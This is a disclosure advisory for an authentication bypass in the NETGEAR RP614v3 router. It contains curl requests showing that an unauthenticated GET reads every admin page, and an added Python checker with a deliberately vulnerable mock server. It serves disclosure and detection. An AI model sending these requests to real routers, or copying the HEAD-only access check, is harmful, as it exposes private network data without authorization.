###########################################
Vendor      : NETGEAR
Product     : RP614v3
informed on : 12. 10. 2015
responded   : no
fixed       : no
Effect      : Remotely exploitable over LAN/WLAN
Type        : Authentication Bypass
Difficulty  : trivial
###########################################

The N300 FW authentication bypass inspired me to check my rp614v3 router, and I found this bypass:

Firmware: V6.0GR Oct 26 2004 (which seems to be the latest)

It's an old model, but it's still in operation on ADSL2 connections such as TCOM DSL6000 in Germany.

How it works:

If you use a normal browser, it sends a HEAD, followed by a GET, to the router. The HEAD for a protected page gets a 403 Forbidden back (curl -I issues a HEAD request):

    # curl -I "http://192.168.1.1/contents1.html"
    HTTP/1.0 403 Forbidden

This was expected and is the correct answer. But if you send a GET instead of the HEAD while you are not authenticated, you get a 200 back, with the full page body:

    # curl -i "http://192.168.1.1/contents1.html"
    HTTP/1.0 200 OK
    Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc.
    Content-length: 7158
    Accept-ranges: bytes
    Content-type: text/html
    ...

This works for every page, disclosing all the information the router has to offer. No password or username is needed. Example (the attached-devices table of the LAN page, headers translated from German):

    # curl -i "http://192.168.1.1/lanform.html"
    HTTP/1.0 200 OK
    Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc.
    Content-length: 13722
    Accept-ranges: bytes
    Content-type: text/html
    ...

    # | IP address  | Device name | MAC address
    1 | 192.168.1.2 | LapTop      | 00:15:a5:d5:f7:7c
    2 | 192.168.1.3 | Accesspoint | 21:6e:5c:23:86:a2
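The following is an added example, not code from the advisory author: a small checker that reproduces the HEAD-versus-GET test above against a host and flags a page as bypassed when the router refuses HEAD (403) but serves the body to an unauthenticated GET (200). Because no RP614v3 is needed to try it, the block also contains a constructed mock HTTP server that imitates the reported behaviour (only HEAD is access-checked), beside a hardened variant that checks every method; the Basic-auth credential in the mock is a hypothetical value for the mock only, not the router's.

```python
"""Checker for the HEAD/GET authentication bypass reported above.

Added example, not part of the original advisory. It assumes the router
behaves as reported: HEAD on a protected page -> 403, unauthenticated
GET on the same page -> 200 with a body. The mock servers below are
constructed here so the check runs offline; they are not NETGEAR firmware.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Pages named in the advisory; any admin page is reported to behave the same.
PROTECTED_PAGES = ["/contents1.html", "/lanform.html"]


def probe(host, port, path, headers=None, timeout=5):
    """Send a HEAD and a GET for `path`; return status codes and GET body length."""
    statuses = {}
    for method in ("HEAD", "GET"):
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request(method, path, headers=headers or {})
            resp = conn.getresponse()
            statuses[method] = resp.status
            if method == "GET":
                statuses["length"] = len(resp.read())
        finally:
            conn.close()
    return statuses


def is_bypass(statuses):
    """Bypass = server refuses HEAD but hands the page to a credential-less GET."""
    return (statuses.get("HEAD") == 403
            and statuses.get("GET") == 200
            and statuses.get("length", 0) > 0)


def check_host(host, port=80, pages=PROTECTED_PAGES):
    """Map each protected page to True (bypass present) or False."""
    return {p: is_bypass(probe(host, port, p)) for p in pages}


# --- Constructed mocks of the router's embedded HTTPD (not real firmware) ---
FAKE_PAGE = b"<html><body>LAN settings (constructed sample page)</body></html>"
# Hypothetical credential for the mock only: base64("admin:password").
MOCK_AUTH = "Basic YWRtaW46cGFzc3dvcmQ="


class RouterMock(BaseHTTPRequestHandler):
    """Shared handler; subclasses decide which methods are access-checked."""
    REQUIRE_AUTH_ON = ()

    def _authorized(self):
        return self.headers.get("Authorization") == MOCK_AUTH

    def _handle(self):
        if self.command in self.REQUIRE_AUTH_ON and not self._authorized():
            self.send_response(403)
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Server", "Embedded HTTPD v1.00, 1999(c) Delta Networks Inc.")
        self.send_header("Content-type", "text/html")
        self.send_header("Content-length", str(len(FAKE_PAGE)))
        self.end_headers()
        if self.command == "GET":
            self.wfile.write(FAKE_PAGE)

    do_GET = do_HEAD = _handle

    def log_message(self, *args):  # keep the mock quiet
        pass


class RP614v3Mock(RouterMock):
    """Models the reported bug: the auth check is applied to HEAD only."""
    REQUIRE_AUTH_ON = ("HEAD",)


class FixedMock(RouterMock):
    """Hardened form: every method that can reach a protected page is checked."""
    REQUIRE_AUTH_ON = ("HEAD", "GET")


def start_mock(handler, port=0):
    """Start `handler` on 127.0.0.1 in a daemon thread; caller shuts it down."""
    srv = HTTPServer(("127.0.0.1", port), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    # Against a real device: check_host("192.168.1.1")
    for name, handler in (("vulnerable mock", RP614v3Mock), ("fixed mock", FixedMock)):
        srv = start_mock(handler)
        try:
            for page, vuln in check_host("127.0.0.1", srv.server_port).items():
                print(f"{name} {page}: {'BYPASS' if vuln else 'ok'}")
        finally:
            srv.shutdown()
            srv.server_close()
```

Against a real device, `check_host("192.168.1.1")` performs exactly the two curl requests from the advisory per page; only a 200 with a non-empty body counts, so a device that answers GET with an empty 200 or a redirect to a login page is not flagged.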